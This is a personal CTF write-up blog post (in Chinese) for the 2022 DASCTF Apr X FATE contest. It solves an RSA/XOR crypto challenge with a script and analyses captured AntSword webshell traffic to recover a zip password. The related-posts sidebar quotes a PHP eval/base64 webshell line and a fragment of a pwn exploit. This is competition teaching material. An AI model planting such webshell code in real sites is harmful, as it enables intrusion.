2022DASCTF Apr X FATE 防疫挑战赛个人Writeup

已于 2022-04-30 12:03:30 修改
阅读量750 收藏
点赞数 1
文章标签: 网络安全
于 2022-04-24 16:01:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/124382077
版权

这次下午有事,上午做了两道就溜了,简单记录一下。

文章目录

Crypto

easy_real

读题目代码:

import random
import hashlib

flag = 'xxxxxxxxxxxxxxxxxxxx'
key = random.randint(1,10)
for i in range(len(flag)):
	crypto += chr(ord(flag[i])^key)
m = crypto的ascii十六进制
e = random.randint(1,100)
print(hashlib.md5(e))
p = 64310413306776406422334034047152581900365687374336418863191177338901198608319
q = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
n = p*q
c = pow(m,e,n)
print(n)
print(c)
#37693cfc748049e45d87b8c7d8b9aacd
#4197356622576696564490569060686240088884187113566430134461945130770906825187894394672841467350797015940721560434743086405821584185286177962353341322088523
#3298176862697175389935722420143867000970906723110625484802850810634814647827572034913391972640399446415991848730984820839735665233943600223288991148186397

逻辑比较简单,这里简单说一下思路:

  1. e的取值只有100种可能,直接暴力破解MD5值,得e的值为23
  2. n的值不算太大,直接分解可得pq
  3. key的值也只有10种可能,且单独作用flag的每一位,直接暴力破解

EXP如下:

import hashlib
from Crypto.Util.number import *
import gmpy2

e = 23
assert hashlib.md5(str(e).encode()).hexdigest()=='37693cfc748049e45d87b8c7d8b9aacd'

p = 64310413306776406422334034047152581900365687374336418863191177338901198608319
q = 65267138038038699886916162739434586079731613825212388229424706115289974540917
n = 4197356622576696564490569060686240088884187113566430134461945130770906825187894394672841467350797015940721560434743086405821584185286177962353341322088523
assert p*q == n

c = 3298176862697175389935722420143867000970906723110625484802850810634814647827572034913391972640399446415991848730984820839735665233943600223288991148186397

phi = (p-1) * (q-1)
d = gmpy2.invert(e, phi)
# 3102394025382775721579985827463742674392660040462144012428394227091539827312695734394149699485056174680299762849346557164285852236056111101795024023129039

m = pow(c, d, n)
# 2976168736142380455841784134407431434784057911773423743751382131043957

crypto = long_to_bytes(m).decode()
for key in range(1,11):
    for s in crypto:
        num = ord(s)
        print(chr(num^key),end='')
    print()

Misc

SimpleFlow

流量分析题,打开文件查看http报文,根据报文特征得知是蚁剑。
看到某一个目录下存在一个flag.zip文件。
继续往后翻,定位到最后一个报文,返回了压缩文件的内容。
在这里插入图片描述

保存下来报文数据,提示一下

  1. 要保存报文的原始二进制数据,而不是字符流数据。
  2. 前面的eb327956是蚁剑生成的随机字符,需要去掉,否则压缩包文件头是错误的。后面对应也有一串,不过文件尾问题不大,可以保留。

保存下来以后发现解压需要密码,尝试爆破无果,遂继续往上翻流量。

发现他是压缩了flag.txtflag.zip里,定位到一个报文。

在这里插入图片描述
解Base64编码,经过信息收集,可得知需要去除开头两个字符:

$p=base64_decode(substr($_POST["o1faebd4ec3d97"],2));

g479cf6f058cf8的值按照如上规则解码得:

cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E]

因此压缩包密码为PaSsZiPWorD,解压即可得到flag。

冰墩墩

这个赛后复现的,单独开一篇吧。
2022DASCTF Apr X FATE 防疫挑战赛——【Misc】冰墩墩

熟悉的猫

2022DASCTF Apr X FATE 防疫挑战赛——【Misc】熟悉的猫

Web

warmup-php

2022DASCTF Apr X FATE 防疫挑战赛——【Web】warmup-php

2ha0yuk7on.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
2022DASCTF Apr X FATE 防疫挑战赛 WriteUP
Huamang的博客
04-25 2223
文章目录MiscSimpleFlowWebwarmup-phpsoeasy_php Misc SimpleFlow 看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包 后面的包里面发现flag.zip 但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量 @eval(@base64_decode($_POST['m8f8d9db647ecd'])); &e57fb9c067c677=o3 &g479cf6f058c
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
2022DASCTF Apr X FATE 防疫挑战赛 good_luck
臭nana的博客
04-24 791
这道题最开始的附件,代码是随机生成一个0~199的数,然后0触发格式化字符串漏洞,1触发栈溢出漏洞,修改后的附件随机数是0或者1 下面是脚本,脚本逻辑:通过栈溢出返回到格式化字符串漏洞函数,泄露libc地址,然后再返回到main函数,通过栈溢出执行onegadget 几率:第一次执行栈溢出1/2,第二次再次执行栈溢出1/2,1/4的概率执行成功 from pwn import * from LibcSearcher import * context(log_level = "debug") csu
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 899
简单
2022DASCTF Apr X FATE 防疫挑战赛复现
m0_62129839的博客
05-22 422
misc 第二题: wireshark打开直接搜字符串flag,发现4个字段含有flag,其中一个发现是zip文件,想把它提取出来, 将他数据导入一个新的zip文件,打开 在50段找到密码加密字段,找好格式用base64解码,得到密码,解开得到flagPaSsZiPWorD 第三题熟悉的猫: 被卡住了,下载好了keepass,可是解码工具却一直下不好,下好了也用不上。暂时搁置。 ...
[Re]2022DASCTF Apr X FATE 防疫挑战赛
PMR的博客
04-24 759
[Re]2022DASCTF Apr X FATE Crackme
2022DASCTF Apr X FATE CTF部分wp
3tefanie丶zhou的博客
04-25 2979
【只是两个人相处,那么喜欢一个人,可能会觉得她哪里都好,但是以后在一起了,就要学会喜欢她的不好】
2022HFCTF-线上赛官方Writeup1
08-04
在HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
江苏科技大学校赛JUSTCTF个人writeup
01-17
"CTF 竞赛Writeup" CTF 竞赛是指 Capture The Flag 竞赛,是一种主要面向网络安全和编程爱好者的竞赛。JUSTCTF 是江苏科技大学举办的 CTF 竞赛,本文将对该竞赛的题目进行总结和解析。 一、直接 flag 直接 flag ...
自己ctf比赛的writeup.zip
10-01
在CTF(Capture The Flag)比赛中,Writeup通常是指参赛者对比赛过程、解题思路以及解决方案的详细记录。这个“自己ctf比赛的writeup.zip”文件很可能包含了作者在参与CTF比赛时的全部心得体验,包括但不限于解题...
2015MSC移动安全挑战赛Writeup
12-10
2015MSC移动安全挑战赛的解题报告,共三题。
2022DASCTF Apr X FATE 防疫挑战赛 部分web复现
errorr0
04-28 1653
DAS的部分web复现
[Misc]2022DASCTF Apr X FATE 防疫挑战赛 wp
mumuzi的博客
04-24 4401
das4
2022DASCTF Apr X FATE 防疫挑战赛
qq_61620566的博客
05-03 234
ctf DAS
2022DASCTF Apr X FATE 防疫挑战赛:熟悉的猫
qq_46230755的博客
04-24 936
很久没更新了,蛮更一下。 附件打开两个文件 kdbx文件的话,是一种windows 的密码文件,可以用KeePass软件开。 但是打开有密码,可以用passwordk kit 直接进行爆破。文件名为len5,所以选的是5位数字,得到密码13152 然后进去里面获取压缩包密码 打开压缩包,发现里面存在一个图片和一个hint hint有一个k,猜测可能是tupper解密。 同时,这个文件存在着零宽,利用网站得到了hint:22*160 网上直接找脚本进行修改,改一下k还有默认参数,得到了两个参数121和
2022DASCTF Apr X FATE 熟悉的猫
qq_61620566的博客
05-05 453
文件解压,flag.zip和len5.kdbx 这里不要用Windows自带的解压方式打开,flag.zip否则会报错,如上所示,用bandzip 解压到桌面,接着.kdbx文件用专门的软件打开:链接:https://keepass.info/news/n220109_2.50.html 将.kdbx 文件放到kali下,用kali卡里自带的解密工具keepass2john 获取文件的hash,这里注意我用箭头标注的地方,之前有一段字母,要去掉之后才能解密,即len5之前的内容全...
2022DASCTF Apr X FATE 防疫挑战赛 Writeup
末初的CSDN博客
04-25 2534
文章目录SimpleFlow熟悉的猫冰墩墩 废物选手的misc做题记录 SimpleFlow 首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2) 找到对应的参数,然后去掉前面两位字符解码即可 cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E] 得到压缩包密码:PaSsZi
easy_real复现
qq_61774705的博客
04-30 266
题目源码: import random import hashlib flag = 'xxxxxxxxxxxxxxxxxxxx' key = random.randint(1,10) for i in range(len(flag)): crypto += chr(ord(flag[i])^key) m = crypto的ascii十六进制 e = random.randint(1,100) print(hashlib.md5(e)) p = 64310413306776406422334034...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值